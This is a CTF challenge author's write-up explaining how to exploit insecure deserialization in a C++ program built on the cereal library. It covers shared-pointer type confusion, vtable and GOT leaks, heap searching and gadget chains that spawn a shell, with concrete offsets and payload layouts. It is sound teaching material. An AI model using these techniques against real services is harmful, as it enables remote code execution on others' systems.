Sharing is Caring: Arbitrary Code Execution for Breakfast
Turning happy little accidents into CTF challenges has never been more rewarding.
Deserialization attacks have grown in popularity over the past decade, with major code execution flaws hitting giants such as Microsoft SharePoint, even in 2025. But what if we could perform deserialization attacks in C++?
Recently, I designed a CTF pwn challenge demonstrating deserialization attacks on a C++ program written with the cereal library.
In this post, we'll revisit C++ internals and explore binary exploitation techniques beyond ROP. We’ll learn how even a properly written C++ program could be vulnerable to remote code execution thanks to insecure deserialization.
The Challenge
The CTF has ended, but the binaries are public! If you want to try solving it or want to follow along, you can grab the challenge distribution pack here!
- Name: Breakfast
- Solves: 11
- Difficulty: Medium?
- Description:
They say breakfast is the most important meal of the day. But sometimes you just need milk to avoid Confusing your favourite Type of cereal...
The code is short, but don't let that fool you. A lot of serialization stuff is abstracted by the cereal library.
The code first outputs the serialization of three types: `Congee`, `Toast`, and `Fruit`. Then it enters a loop which deserializes input and prints the deserialized values.
Running it in the terminal:
C++ Internals Redux
To better understand the program and how the exploitation works, let's review some C++!
If you're familiar, you may want to skip ahead.
What are shared pointers?
Shared pointers (`std::shared_ptr`) are smart pointers in C++ that enable multiple pointers to manage the lifetime of a single object. They use reference counting to track how many `shared_ptr` objects point to the same dynamically allocated resource. The object is automatically deleted when the last remaining `shared_ptr` pointing to it is destroyed or reset. This provides automatic memory management while allowing shared ownership.
Key Point for Exploitation: Multiple shared pointers may share a single object, which requires complex (de)serialization procedures to encode and decode.
Example:
Output:
What are virtual tables?
A vtable (virtual table) is the mechanism that enables runtime polymorphism in C++.
- Each virtual class (any class containing virtual functions) has one corresponding virtual table (vtable).
- The vtable stores an array of pointers to the class's virtual functions.
- Each object of a virtual class holds a virtual pointer (vpointer) which points to the vtable of the class it was instantiated as. The vpointer is a "hidden first member" and precedes other members.
- When a virtual function is called, dynamic dispatch is carried out by looking up the vtable then jumping to a function at a hard-coded offset. In assembly, this could be seen as a double dereference.
For further reading, I recommend checking out: Understanding Virtual Tables in C++ by Pablo Arias and this StackOverflow Q&A.
Key Points for Exploitation: 1) If an attacker controls the vpointer, they can hijack control flow. 2) The vpointer is the first member of any object of a virtual class.
What is an std::string?
We all know what a string is in programming, but what does C++'s `std::string` look like?
If we dig into the source code (which you can find in pretty much any distribution by following the definition of `std::string`), we see the implementation is roughly equivalent to:
Ignoring short-string optimisation and other factors, an `std::string` simply consists of three members: the buffer (a pointer to the actual characters), the size, and the capacity of the dynamically allocated memory.
This allows for a growable string, suitable for dynamic operations such as append, replace, and remove.
Key Point for Exploitation: If we control `buffer`, we can achieve arbitrary memory read.
Analysis
Initial Analysis
First step: Understanding what we have, aka enumeration. What protections are in place? What attack primitives are available?
Protections are typically easy to check. Running `checksec`, we see NX and PIE are enabled. This means shellcode is out of the question. By default, ASLR is also enabled, so we'll want some kind of address leak to do anything useful.
Looking at the code, we see 3 classes deserialized.
Cereal supports serialization of `std::shared_ptr`. But how are shared references handled?
Cereal's JSON format uses an `id` key for shared pointers. If `id` is greater than `2 << 30` (2147483648), meaning the most significant bit of the 32-bit value is set, then the object is new and memory should be allocated for it. Otherwise, the object was seen before and the old `std::shared_ptr` should be copied.
For instance, here's a sample JSON cereal-isation containing shared references:
In the above code example, 2147483649 and 2147483650 refer to new objects with ID 1 and 2. Memory is dynamically allocated and object data is deserialized. Afterwards, the deserializer encounters `"id": 1` which refers to the first object. No new data is deserialized, and the first `std::shared_ptr` is copied.
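To make the id convention concrete, here is a minimal Python sketch that splits an id into its "new object" flag and its object number. It only encodes the rule described above; the helper name `decode_ptr_id` is hypothetical and is not part of Cereal.

```python
# Sketch of the id convention described above. The flag value comes from the
# text (2 << 30); the helper name is hypothetical, not a Cereal API.
NEW_OBJECT_FLAG = 2 << 30  # 0x80000000, the top bit of a 32-bit id


def decode_ptr_id(raw_id: int) -> tuple:
    """Split a shared pointer id into (is_new, object_id)."""
    is_new = bool(raw_id & NEW_OBJECT_FLAG)     # top bit set: allocate a new object
    object_id = raw_id & (NEW_OBJECT_FLAG - 1)  # low 31 bits: which object
    return is_new, object_id


if __name__ == "__main__":
    for raw in (2147483649, 2147483650, 1):
        print(raw, decode_ptr_id(raw))
```

Read this way, 2147483649 is "new object 1" and a later plain `1` is "reuse object 1", which is exactly the back-reference we want to abuse.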
We've figured out how Cereal handles shared references, but how can we apply it to the challenge?
Well, what if we force a shared reference, even if the deserialized types are different?
Type Confusion Primitives
It turns out Cereal does not perform type checking. So if the deserialization handles multiple types, we can abuse it for type confusion!
I'll share a deep-dive into the type confusion primitives in a future post. For now, it suffices to understand what primitives are available in this challenge and how to achieve those primitives.
Here are the types again, for reference:
If we deserialize a... | followed by a... | we get... | because we... |
---|---|---|---|
Toast | Fruit | Address Leak (ASLR Bypass) | leak the vtable |
Congee | Fruit | Arbitrary Memory Read | control string internals |
Congee | Toast | Control Flow Hijacking | control the vpointer |
For instance:
- We have control over one type, say `Toast`.
- We trick Cereal into thinking the second type (`Fruit`) is a `Toast`. This way, we force a `Fruit` and `Toast` to share the same memory.
- When `Fruit` is used, C++ gets confused. When it tries to print `Fruit::name`, what actually gets printed is `*Toast::vptr` (vtable entry of `Toast`). Calamity!
Together, these primitives are enough to obtain arbitrary code execution!
Exploitation
Great, we've found the chink in the armor. Now let's draft a plan of attack.
- Leak the VTable address. (`Toast` → `Fruit`) This allows us to bypass ASLR/PIE as we now know the base address of the binary and can calculate offsets to other locations.
- Leak a libc/libstdc++ address. (`Congee` → `Fruit`) This allows us to calculate offsets to gadgets.
- Find a heap address. (`Congee` → `Fruit`) We'll need this address for the next step.
- Craft a gadget chain and hijack control flow to point to said chain. (`Congee` → `Toast`) We'll use the 64 bytes available in `Congee` to plant a fake vtable containing a gadget chain. When the virtual function is called, the chain is triggered. (I provided 8 quads of room, but I managed to golf it to only 4 quads.)
Leaking the VTable
Leaking the vtable is rather straightforward. We simply set the `id` of our `Fruit` object such that it refers to the `Toast` object. But wait: since `Fruit` is a string, we should make sure the size is non-zero. Luckily, we can control the size using `Toast`'s `spread` parameter.
To recap, by type-confusing `Fruit` and controlling `spread`, we map `Toast`'s vpointer to `Fruit`'s string buffer and `Toast`'s `spread` parameter to `Fruit`'s string size.
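The overlap can be pictured by packing a `Toast` as raw bytes and reading the same bytes back as string fields. This is only a sketch under stated assumptions: the vtable address is made up, and I assume `spread` occupies the 8-byte slot right after the vpointer (the real layout depends on the member's type and padding).

```python
import struct

# Hypothetical values, for illustration only.
toast_vptr = 0x0000560864BE0D10   # made-up vtable address
toast_spread = 8                  # chosen so the "string" is 8 bytes long

# Assumed Toast layout: [vpointer][spread], two little-endian quadwords.
toast_bytes = struct.pack("<QQ", toast_vptr, toast_spread)

# The same 16 bytes, reinterpreted as the first two std::string fields.
string_buffer, string_size = struct.unpack("<QQ", toast_bytes)

print(f"buffer = {string_buffer:#x}, size = {string_size}")
```

With a size of 8, printing the confused string dumps exactly one quadword from wherever the vpointer points.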
When deserialized, `t` and `f` share the same object. When `*f` is printed, it will print the first entry of the vtable, which is `Toast::eat`. This is because printing a string will dereference the string buffer and it so happens that the current string buffer is the vtable.
We can do a quick PoC with `xxd`. By changing the initial JSON's `value1.ptr_wrapper.data.spread` and `value2.ptr_wrapper.id` objects, we can induce the binary to spit out 8 weird bytes, which happen to be an address leak of `0x560864bd50c2`! (Hint: It's in little endian, so read the leaked number backwards.)
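In a script, "reading the number backwards" is a one-liner. The byte string below is reconstructed from the address quoted above (padded to 8 bytes), not copied from the actual program output.

```python
# Eight leaked bytes, reconstructed from the address quoted in the text.
leak = bytes.fromhex("c250bd6408560000")

# Little endian: the least significant byte comes first.
address = int.from_bytes(leak, "little")

print(hex(address))  # 0x560864bd50c2
```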
Arbitrary Memory Read!
Now that we have an address from the binary, we can continue on our warpath by leaking a libc address. To do so, we’ll use the `Congee` → `Fruit` primitive which allows control over the properties of an `std::string` and grants us an arbitrary memory read!
We'll use the GOT entry of `malloc` as the string buffer. GOT entries sit at a known offset from the binary's base, so we can calculate the entry's address from our earlier vtable leak. When the string is printed, the GOT entry will be dereferenced and we get the address of `malloc`.
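The address arithmetic looks roughly like the sketch below. Both offsets are placeholders I made up for illustration; the real ones have to be read out of the challenge binary (for example with a disassembler or `readelf`).

```python
# Placeholder offsets: NOT taken from the challenge binary.
TOAST_EAT_OFFSET = 0x60C2     # hypothetical offset of Toast::eat from the PIE base
MALLOC_GOT_OFFSET = 0x1BF58   # hypothetical offset of malloc's GOT entry


def got_entry_address(leaked_eat: int, eat_offset: int, got_offset: int) -> int:
    """Turn a leaked code pointer into the runtime address of a GOT entry."""
    pie_base = leaked_eat - eat_offset
    # A PIE base is page-aligned; anything else means an offset is wrong.
    if pie_base & 0xFFF:
        raise ValueError(f"suspicious PIE base {pie_base:#x}")
    return pie_base + got_offset


if __name__ == "__main__":
    target = got_entry_address(0x560864BD50C2, TOAST_EAT_OFFSET, MALLOC_GOT_OFFSET)
    print(f"point the fake string buffer at {target:#x}")
```

The alignment check is a cheap sanity test: if the computed base does not end in `000`, there is no point sending the next payload.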
Finding the Heap Address
Why do we need a heap address?
During type confusion, we will be controlling a malicious vpointer (not the vtable!). To actually get control flow hijacking, we want the vpointer to point to a vtable, which can either be found in program memory as a gadget or maliciously crafted and placed within the remaining 7 quadwords of `Congee`. It’s easier to conceive of the latter; thus we need a heap address to the chunk where `Congee` will be allocated.
To get a simple heap address leak, we can read any memory location that holds a heap pointer. There are several approaches.
- One way is to obtain the main arena, which can be found at libc offset `+0x203ac0`. This then necessitates a convoluted hunt for heap addresses through a sea of indirection.
- Alternatively, a simpler method I observed from submissions is to take advantage of a `cereal::base64::chars` string declared globally in the binary. By reading from this memory, we can leak the string buffer of `cereal::base64::chars`.
For the sake of simplicity, we'll stick with the `cereal::base64::chars` method.
Finding Congee's Address
By observation, `Congee`’s address remains unchanged between iterations. This means if we know the address of `Congee` this iteration, we can reuse that address next iteration.
Fortunately, `Congee`'s offset from the heap's base address is constant and we can calculate it to be `+0x131c0`... at least locally.
Finding Congee's Address: Less Hacky Method
Perhaps that seems too hacky or inelegant to some. What if the offset was random? That would likely be the case in a more complex C++ program, one with heaps of memory allocation and deallocation. In that case, I offer an alternative approach.
We can use the bytes in `Congee` to store a canary/needle, some kind of fixed string or pattern. Using our leaked heap address as a reference, we'll perform a giant memory read (e.g. `0x1000` bytes) and look for the needle.
In the following code, we'll look for the fixed pattern `ABCD` (`0x41424344`) preceded by other bytes in Congee.
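A minimal sketch of such a needle search (not the original solve code) might look like this. The function name and the `needle_offset` parameter are hypothetical; `needle_offset` is how far into `Congee` we planted the needle.

```python
from typing import Optional


def locate_congee(dump: bytes, dump_base: int,
                  needle: bytes = b"ABCD",
                  needle_offset: int = 0) -> Optional[int]:
    """Return Congee's address given a memory dump that starts at dump_base.

    needle_offset is the needle's position inside Congee, so subtracting it
    from the needle's address yields the start of the object.
    """
    index = dump.find(needle)
    if index == -1:
        return None  # needle not in this window; read more memory and retry
    return dump_base + index - needle_offset


if __name__ == "__main__":
    # Synthetic dump: 0x40 bytes of noise, then a fake Congee with the needle
    # planted 8 bytes in.
    fake_dump = b"\x00" * 0x40 + b"XXXXXXXX" + b"ABCD" + b"\x00" * 16
    print(hex(locate_congee(fake_dump, 0x55550000, needle_offset=8)))
```

If the needle is not found, the function returns `None` so the caller can slide the read window and try again.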
After a quick test run, we confirmed this seems to work.
Arbitrary Code Execution (ACE) via Gadget Chains
We finally have enough information to get code execution! To do so, we could construct a gadget chain in `Congee` and trigger the chain by controlling the vpointer in `Toast`.
1) When `toast->eat()` is called, the vtable is looked up. Due to type confusion, it actually uses a vpointer we control. 2) We control the vpointer to point to a vtable within the same `Congee` payload. The vtable contains a gadget which is called.
Essentially, by controlling the vpointer and vtable, we control the virtual function being called. But how do we craft a malicious function? The answer lies in gadgets.
PCOP / JOP
Classic ROP gadgets end in `ret`. Upon hitting the `ret`, the Instruction Pointer is set to the next item on the stack. Hence, gadgets could be chained by writing a block of memory to the stack.
PCOP/JOP gadgets are similar, but end in different instructions.
- PCOP (Pure Call Oriented Programming): ends in `call SOMETHING` which directly jumps to the next gadget
- JOP (Jump Oriented Programming): ends in a `jmp`/`call` which jumps to a dispatcher, before jumping into a table of gadgets. The dispatcher's job is to increment a "gadget pointer" before jumping to the next gadget.[1]
The advantage of PCOP/JOP is that they don't rely on the stack, but rather on the state of the registers. Instead of stack-based instructions such as `pop` and `ret`, we prefer instructions such as `mov` and `call`.
- ROP Gadget: `pop rax; ret`.
- PCOP/JOP Gadget: `mov rax, [rdi+8]; call [rax+0x10]`
Approach 1: libstdc++ & One-Gadget
Funnily enough, this was the first working solution I came up with, and it's also the shortest payload I've seen so far as it fits within 4 quads.
A One-Gadget is a gadget which pops a shell if certain conditions are met. By running `one_gadget`, we can find several gadgets which potentially spawn `/bin/sh`.
From here, we could choose any one-gadget for ACE. But to meet the conditions, we should understand the state of the registers at the moment the virtual function is called. This calls for some breakpoints!
Disassembly and registers upon reaching `Toast::eat()`, reachable via `b *main+1121; si`.
By navigating to `Toast::eat()`, we notice the following interesting register states:
- `rax == rdi`: non-controllable, address of virtual object (`&*t`)
- `rdx`: controllable, first address to jump to
- `rsi == r13 == 0`
Our attention then turns to fulfilling the one-gadget constraints. I chose the third (offset `0xef4ce`) for its relatively simple conditions: we just need `rbx = r12 = 0`. We can hunt for gadgets with tools such as `ROPgadget` or `xgadget` and filter for gadgets which allow control over our desired registers.
Importantly, we should ensure the final `call` instruction of a gadget jumps to a desirable offset within `Congee`, e.g. `call [rax+0x10]`. We should also exclude gadgets relying on the stack. This means excluding any gadget containing `pop`, `leave`, or `ret`.[2]
Output of `xgadget --reg-overwrite r12 --jop /usr/lib/x86_64-linux-gnu/libstdc++.so.6`. We found a useful `mov r12, rsi` gadget which sets `r12` to 0. Additionally, the gadget will go to `[rax+0x10]` meaning we can place another gadget at the `+0x10` offset to continue the chain.
After a while, we ended up with two simple gadgets from `libstdc++`. Constructing the final payload is simply a matter of cooking congee with the right ingredients:
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x08 | vpointer, points to offset 0x08 |
0x08 | libstdcpp + 0xf0a0c | first gadget, set r12 to 0 (r12 = rsi ) |
0x10 | libstdcpp + 0xf5e83 | second gadget, set rbx to 0 (rbx = rsi ) |
0x18 | libc + 0xef4ce | one-gadget, sweet sweet code execution! |
The gadget flow is extremely straightforward:
- VTable is at Congee address + `0x08` →
- gadget at `0x08` (set `r12` to 0) →
- gadget at `0x10` (set `rbx` to 0) →
- gadget at `0x18` (one-gadget ACE).
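As raw bytes, the ingredients table above boils down to four little-endian quadwords. The sketch below uses the offsets from the table; the function name and the three base addresses passed in are hypothetical stand-ins for the values leaked in the earlier steps. How these bytes are then fed into Congee's serialized fields is not shown here.

```python
import struct


def build_one_gadget_payload(congee_addr: int, libstdcpp_base: int,
                             libc_base: int) -> bytes:
    """Pack the 4-quad fake vtable chain from the ingredients table."""
    quads = [
        congee_addr + 0x08,        # 0x00: vpointer, points at offset 0x08
        libstdcpp_base + 0xF0A0C,  # 0x08: first gadget, r12 = rsi (= 0)
        libstdcpp_base + 0xF5E83,  # 0x10: second gadget, rbx = rsi (= 0)
        libc_base + 0xEF4CE,       # 0x18: one-gadget
    ]
    return struct.pack("<4Q", *quads)


if __name__ == "__main__":
    # Made-up addresses, for illustration only.
    payload = build_one_gadget_payload(0x55550000, 0x7F0000200000, 0x7F0000000000)
    print(payload.hex())
```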
Putting it all together, we get ACE.
Approach 2: `system("/bin/sh")` Gadget Chain
Credit: Adapted from @erge’s and @lolc4t’s solutions.
I'm sure this gadget chain feels closer to home for ROPpers. The chain works by setting `rdi` to `"/bin/sh"` and calling the `system` function. Despite the need for 6 quads in Congee, I find the chain rather fascinating as it condenses multiple steps into 2 key gadgets.
Another nice aspect about this chain is that it does not rely on too much register state, only on `rax` and `rdi`. (The libstdc++ and one-gadget chain relies on `rsi = 0` which may not always be the case.)
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x10 | vpointer |
0x08 | address of Congee + 0x18 | address of [system, binsh, gadget2] structure |
0x10 | libc + 0x1740b1 | first gadget, mov rax, [rdi+8]; call [rax+0x10] |
0x18 | system | sweet sweet code execution! |
0x20 | &"/bin/sh" | address of any /bin/sh string |
0x28 | libc + 0xa5688 | second gadget, mov rdi, [rax+8]; call [rax] |
The call flow is:
- VTable is at Congee address + `0x10` →
- gadget at `0x10` (set `rax` to `*(rdi+0x08)`, which is the second Congee entry, or in other words: Congee address + `0x18`) →
- gadget at `0x28` (set `rdi` to `"/bin/sh"`) →
- gadget at `0x18` (`system` ACE).
To make this gadget chain work, we require `system`, the `/bin/sh` pointer, and the `0xa5688` gadget to be contiguous in memory. This is because after the `mov rax` in the first step, the subsequent assembly will `call [rax+0x10]`, which triggers the second gadget to copy `[rax+0x08]` to `rdi` and then `call [rax]`.
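To convince ourselves the layout holds together, we can replay the call flow on a toy memory model. This is a sketch, not a real emulator: memory is a plain dictionary, the gadget semantics are hard-coded from the table above, and every address passed in is a made-up placeholder.

```python
def build_chain(congee, gadget1, gadget2, system, binsh):
    """Lay out the six quads from the ingredients table as {address: value}."""
    return {
        congee + 0x00: congee + 0x10,  # vpointer
        congee + 0x08: congee + 0x18,  # pointer to [system, binsh, gadget2]
        congee + 0x10: gadget1,        # mov rax, [rdi+8]; call [rax+0x10]
        congee + 0x18: system,
        congee + 0x20: binsh,
        congee + 0x28: gadget2,        # mov rdi, [rax+8]; call [rax]
    }


def trace(memory, congee, gadget1, gadget2):
    """Follow the chain; return (list of call targets, final rdi)."""
    rdi = rax = congee                 # at the virtual call both hold the object
    target = memory[memory[rax]]       # double dereference: vpointer, then entry 0
    calls = [target]
    while target in (gadget1, gadget2):
        if target == gadget1:
            rax = memory[rdi + 0x08]
            target = memory[rax + 0x10]
        else:
            rdi = memory[rax + 0x08]
            target = memory[rax]
        calls.append(target)
    return calls, rdi


if __name__ == "__main__":
    # Placeholder addresses, chosen only to be distinct.
    CONGEE, G1, G2, SYSTEM, BINSH = 0x1000, 0xA1, 0xA2, 0x5E5, 0xB1
    mem = build_chain(CONGEE, G1, G2, SYSTEM, BINSH)
    calls, rdi = trace(mem, CONGEE, G1, G2)
    print([hex(c) for c in calls], hex(rdi))
```

The trace ends at `system` with `rdi` holding the `/bin/sh` pointer, which is the state we want just before the shell pops.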
The order of the other entries doesn’t matter as much. Here’s one of the solves from the CTF community. Notice how the first gadget is placed at the end of the Congee payload.
Alternative implementation by @lolc4t.
Conclusion
This was an interesting challenge to make as it helped refresh my binary exploitation skills despite me sucking at pwn challenges. I was also happy that players came up with different solutions, challenging my biases on the concept of a successful gadget chain.
Overall, this has been a great experience (and hopefully the same goes for others). I have a few variant challenges I might present in future CTFs. We'll see if they make it out.
Special thanks to thehackerscrew CTF team for hosting my CTF challenge and to the players who opened my mind by sharing their solves.
Solve Script
Flag
Footnotes
For further reading on JOP, I recommend reading this StackExchange answer: Security.SE: Concept of Jump-Oriented-Programming (JOP). It provides an excellent summary and brief history on ROP/JOP.
We exclude stack-based gadgets to simplify the exploit, even if an attack with such gadgets may be possible. The reason for doing so is that we don’t have direct control over stack memory. We would need the help of gadgets to push/modify the stack. Even then, modifying the stack without fine-grained control potentially crashes the program. So we explore other alternatives first.